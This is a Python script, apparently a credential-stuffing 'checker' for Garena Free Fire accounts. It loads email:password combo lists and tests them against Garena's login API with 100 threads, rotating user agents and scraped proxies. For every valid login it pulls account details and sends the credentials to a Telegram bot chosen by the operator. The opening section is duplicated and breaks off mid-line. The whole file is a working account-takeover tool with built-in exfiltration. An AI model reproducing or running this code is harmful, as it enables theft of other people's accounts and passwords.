... import os
import sys
import time
import json
import random
import threading
import requests
import socket
import ssl
from queue import Queue
from datetime import datetime
from colorama import Fore, Style, init

init(autoreset=True)

G = Fore.GREEN
Y = Fore.YELLOW
R = Fore.RED
W = Fore.WHITE
CY = Fore.CYAN
B = Fore.BLUE

class MohaSystemPro:
    def __init__(self):
        self.queue = Queue()
        self.hits = 0
        self.bad = 0
        self.checked = 0
        self.token = ""
        self.chat_id = ""
        self.threads = 100
        self.proxies = []
        self.user_agents = [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1",
            "Mozilla/5.0 (Android 14; Mobile; rv:124.0) Gecko/124.0 Firefox/124.0",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/123.0.2420.65",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0",
            "Mozilla/5.0 (iPad; CPU OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1",
            "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
        ]

    def clear_screen(self):
        os.system('clear' if os.name == 'posix' else 'cls')

    def open_telegram_channel(self):
        channel_link = "tg://resolve?domain=MOHA_ALSHALFAWI"
        if sys.platform == "linux":
            os.system(f"termux-open-url {channel_link}")
        else:
            os.system(f"start {channel_link}")

    def print_logo(self):
        logo = f"""
{G} ‚Ėą‚Ėą‚Ėą‚ĖĄ    ‚Ėą  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą  ‚ĖĄ‚ĖĄ‚ĖĄ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėď ‚ĖĄ‚Ėą‚Ėą‚Ėą‚Ėą‚ĖĄ   ‚Ėą    ‚Ėą‚Ėą  ‚Ėą‚Ėą‚ĖÄ‚Ėą‚Ėą‚Ėą  
{G} ‚Ėą‚Ėą ‚ĖÄ‚Ėą   ‚Ėą‚Ėí‚Ėą‚Ėą    ‚Ėí  ‚Ėď  ‚Ėą‚Ėą‚Ėí ‚Ėď‚Ėí‚Ėí‚Ėą‚Ėą‚ĖÄ ‚ĖÄ‚Ėą   ‚Ėą‚Ėą  ‚Ėď‚Ėą‚Ėą‚Ėí‚Ėď‚Ėą‚Ėą ‚Ėí ‚Ėą‚Ėą‚Ėí
{Y}‚Ėď‚Ėą‚Ėą  ‚ĖÄ‚Ėą ‚Ėą‚Ėą‚Ėí‚ĖĎ ‚Ėď‚Ėą‚Ėą‚ĖĄ   ‚Ėí ‚Ėď‚Ėą‚Ėą‚ĖĎ ‚Ėí‚ĖĎ‚Ėí‚Ėď‚Ėą    ‚ĖĄ ‚Ėď‚Ėą‚Ėą  ‚Ėí‚Ėą‚Ėą‚ĖĎ‚Ėď‚Ėą‚Ėą ‚ĖĎ‚ĖĄ‚Ėą ‚Ėí
{Y}‚Ėď‚Ėą‚Ėą‚Ėí  ‚Ėź‚ĖĆ‚Ėą‚Ėą‚Ėí  ‚Ėí   ‚Ėą‚Ėą‚Ėí‚ĖĎ ‚Ėď‚Ėą‚Ėą‚Ėď ‚ĖĎ ‚Ėí‚Ėď‚Ėď‚ĖĄ ‚ĖĄ‚Ėą‚Ėą‚Ėí‚Ėď‚Ėď‚Ėą  ‚ĖĎ‚Ėą‚Ėą‚ĖĎ‚Ėí‚Ėą‚Ėą‚ĖÄ‚ĖÄ‚Ėą‚ĖĄ  
{G}‚Ėí‚Ėą‚Ėą‚ĖĎ   ‚Ėď‚Ėą‚Ėą‚ĖĎ‚Ėí‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėí‚Ėí  ‚Ėí‚Ėą‚Ėą‚Ėí ‚ĖĎ ‚Ėí ‚Ėď‚Ėą‚Ėą‚Ėą‚ĖÄ ‚ĖĎ‚Ėí‚Ėí‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėď ‚ĖĎ‚Ėą‚Ėą‚Ėď ‚Ėí‚Ėą‚Ėą‚Ėí
{W}---------------------------------------------------------
{Y}[#] DEVELOPER: MOHA AL-SHALFAWI
{Y}[#] SYSTEM   : MOHA-02 (ULTIMATE VERSION)
{Y}[#] STATUS   : HIGH SPEED ENGINE (FIXED)
{W}---------------------------------------------------------
        """
        print(logo)

    def system_headers(self):
        return {
            "Accept": "*/*",
            "Accept-Encoding": "gzip, deflate, br",
            "Accept-Language": "ar,en-US;
import os
import sys
import time
import json
import random
import threading
import requests
import socket
import ssl
from queue import Queue
from datetime import datetime
from colorama import Fore, Style, init

init(autoreset=True)

G = Fore.GREEN
Y = Fore.YELLOW
R = Fore.RED
W = Fore.WHITE
CY = Fore.CYAN
B = Fore.BLUE

class MohaSystemPro:
    def __init__(self):
        self.queue = Queue()
        self.hits = 0
        self.bad = 0
        self.checked = 0
        self.token = ""
        self.chat_id = ""
        self.threads = 100
        self.proxies = []
        self.user_agents = [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1",
            "Mozilla/5.0 (Android 14; Mobile; rv:124.0) Gecko/124.0 Firefox/124.0",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/123.0.2420.65",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0",
            "Mozilla/5.0 (iPad; CPU OS 17_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1",
            "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
        ]

    def clear_screen(self):
        os.system('clear' if os.name == 'posix' else 'cls')

    def open_telegram_channel(self):
        channel_link = "tg://resolve?domain=MOHA_ALSHALFAWI"
        if sys.platform == "linux":
            os.system(f"termux-open-url {channel_link}")
        else:
            os.system(f"start {channel_link}")

    def print_logo(self):
        logo = f"""
{G} ‚Ėą‚Ėą‚Ėą‚ĖĄ    ‚Ėą  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą  ‚ĖĄ‚ĖĄ‚ĖĄ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėď ‚ĖĄ‚Ėą‚Ėą‚Ėą‚Ėą‚ĖĄ   ‚Ėą    ‚Ėą‚Ėą  ‚Ėą‚Ėą‚ĖÄ‚Ėą‚Ėą‚Ėą  
{G} ‚Ėą‚Ėą ‚ĖÄ‚Ėą   ‚Ėą‚Ėí‚Ėą‚Ėą    ‚Ėí  ‚Ėď  ‚Ėą‚Ėą‚Ėí ‚Ėď‚Ėí‚Ėí‚Ėą‚Ėą‚ĖÄ ‚ĖÄ‚Ėą   ‚Ėą‚Ėą  ‚Ėď‚Ėą‚Ėą‚Ėí‚Ėď‚Ėą‚Ėą ‚Ėí ‚Ėą‚Ėą‚Ėí
{Y}‚Ėď‚Ėą‚Ėą  ‚ĖÄ‚Ėą ‚Ėą‚Ėą‚Ėí‚ĖĎ ‚Ėď‚Ėą‚Ėą‚ĖĄ   ‚Ėí ‚Ėď‚Ėą‚Ėą‚ĖĎ ‚Ėí‚ĖĎ‚Ėí‚Ėď‚Ėą    ‚ĖĄ ‚Ėď‚Ėą‚Ėą  ‚Ėí‚Ėą‚Ėą‚ĖĎ‚Ėď‚Ėą‚Ėą ‚ĖĎ‚ĖĄ‚Ėą ‚Ėí
{Y}‚Ėď‚Ėą‚Ėą‚Ėí  ‚Ėź‚ĖĆ‚Ėą‚Ėą‚Ėí  ‚Ėí   ‚Ėą‚Ėą‚Ėí‚ĖĎ ‚Ėď‚Ėą‚Ėą‚Ėď ‚ĖĎ ‚Ėí‚Ėď‚Ėď‚ĖĄ ‚ĖĄ‚Ėą‚Ėą‚Ėí‚Ėď‚Ėď‚Ėą  ‚ĖĎ‚Ėą‚Ėą‚ĖĎ‚Ėí‚Ėą‚Ėą‚ĖÄ‚ĖÄ‚Ėą‚ĖĄ  
{G}‚Ėí‚Ėą‚Ėą‚ĖĎ   ‚Ėď‚Ėą‚Ėą‚ĖĎ‚Ėí‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėí‚Ėí  ‚Ėí‚Ėą‚Ėą‚Ėí ‚ĖĎ ‚Ėí ‚Ėď‚Ėą‚Ėą‚Ėą‚ĖÄ ‚ĖĎ‚Ėí‚Ėí‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėď ‚ĖĎ‚Ėą‚Ėą‚Ėď ‚Ėí‚Ėą‚Ėą‚Ėí
{W}---------------------------------------------------------
{Y}[#] DEVELOPER: MOHA AL-SHALFAWI
{Y}[#] SYSTEM   : MOHA-02 (ULTIMATE VERSION)
{Y}[#] STATUS   : HIGH SPEED ENGINE (FIXED)
{W}---------------------------------------------------------
        """
        print(logo)

    def system_headers(self):
        return {
            "Accept": "*/*",
            "Accept-Encoding": "gzip, deflate, br",
            "Accept-Language": "ar,en-US;q=0.9,en;q=0.8",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Origin": "https://ff.garena.com",
            "Referer": "https://ff.garena.com/",
            "User-Agent": random.choice(self.user_agents),
            "X-Requested-With": "XMLHttpRequest"
        }
    def load_user_agents(self):
        self.user_agents.extend([
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36",
            "Mozilla/5.0 (Linux; Android 13; SM-S901B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Mobile Safari/537.36",
            "Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1"
        ])

    def setup_config(self):
        self.clear_screen()
        self.print_logo()
        print(f"{CY}[*] Connecting to Telegram API...")
        self.open_telegram_channel()
        self.token = input(f"{G}[+] Enter Bot Token: ")
        self.chat_id = input(f"{G}[+] Enter Chat ID: ")
        try:
            self.threads = int(input(f"{W}[+] Threads (Default 100): ") or 100)
        except:
            self.threads = 100

    def combo_loader(self):
        print(f"\n{CY}[*] Preparation Phase...")
        file_name = input(f"{W}[+] Drag Combo File Here: ").strip()
        try:
            with open(file_name, 'r', encoding='utf-8') as f:
                for line in f:
                    if ':' in line:
                        self.queue.put(line.strip())
            print(f"{G}[‚úĒ] Loaded {self.queue.qsize()} Accounts Successfully.")
        except Exception as e:
            print(f"{R}[‚úė] Error Loading File: {e}")
            sys.exit()

    def proxy_integrator(self):
        try:
            res = requests.get("https://api.proxyscrape.com/?request=getproxies&proxytype=http&timeout=10000&country=all&ssl=all&anonymity=all")
            self.proxies = res.text.splitlines()
            print(f"{G}[‚úĒ] Pulled {len(self.proxies)} Proxies.")
        except:
            print(f"{R}[!] Starting without Proxies.")
    def check_ff_account(self, account):
        if ':' not in account: return
        user, password = account.split(':')
        session = requests.Session()
        proxy = {"http": random.choice(self.proxies)} if self.proxies else None
        login_url = "https://auth.garena.com/api/login"
        data = {"account": user, "password": password, "app_id": "100067", "source": "pc", "format": "json"}

        try:
            response = session.post(login_url, data=data, headers=self.system_headers(), proxies=proxy, timeout=7)
            res_json = response.json()
            if "access_token" in res_json:
                token = res_json.get("access_token")
                self.extract_account_details(user, password, token)
            elif "error_auth" in res_json:
                self.bad += 1
            else:
                self.queue.put(account)
        except:
            self.queue.put(account)

    def extract_account_details(self, user, pw, token):
        info_url = f"https://api.ff.garena.com/info?access_token={token}"
        try:
            res = requests.get(info_url, headers=self.system_headers(), timeout=5).json()
            level = res.get("level", "1")
            region = res.get("region", "Unknown")
            account_id = res.get("id", "Unknown")
            create_time = res.get("create_time", "2024-01-01")
            
            self.hits += 1
            result_msg = f"ūüďß Email: {user}\nūüĒĎ Pass: {pw}\nūüÜĒ ID: {account_id}\nūüÜô Level: {level}\nūüĆć Region: {region}\nūüďÖ Created: {create_time}"
            print(f"{G}[HIT] {user} | LVL: {level}")
            self.send_telegram_result(result_msg)
            self.save_hit(result_msg)
        except:
            self.hits += 1
            self.send_telegram_result(f"ūüďß Email: {user}\nūüĒĎ Pass: {pw}\n‚ö†ÔłŹ Details Failed.")

    def send_telegram_result(self, account_data):
        url = f"https://api.telegram.org/bot{self.token}/sendMessage"
        payload = {"chat_id": self.chat_id, "text": f"‚úÖ MOHA-02 HIT\n\n{account_data}", "parse_mode": "Markdown"}
        try: requests.post(url, data=payload, timeout=5)
        except: pass
    def save_hit(self, data):
        with open("hits.txt", "a", encoding="utf-8") as f:
            f.write(f"{data}\n" + "-"*30 + "\n")

    def main_checker_logic(self):
        while not self.queue.empty():
            account = self.queue.get()
            self.check_ff_account(account)
            self.checked += 1
            self.queue.task_done()

    def speed_engine_controller(self):
        for _ in range(self.threads):
            worker = threading.Thread(target=self.main_checker_logic)
            worker.daemon = True
            worker.start()
        while not self.queue.empty():
            time.sleep(0.5)
            sys.stdout.write(f"\r{Y}[ST] {G}CHECKED: {self.checked} {W}|{G} HITS: {self.hits} {W}|{R} BAD: {self.bad} ")
            sys.stdout.flush()
        self.queue.join()

    def run_system(self):
        self.clear_screen()
        self.print_logo()
        self.setup_config()
        self.proxy_integrator()
        self.combo_loader()
        self.speed_engine_controller()
        print(f"\n{G}[‚ėÖ] DONE. HITS: {self.hits}")

if __name__ == "__main__":
    app = MohaSystemPro()
    app.run_system()
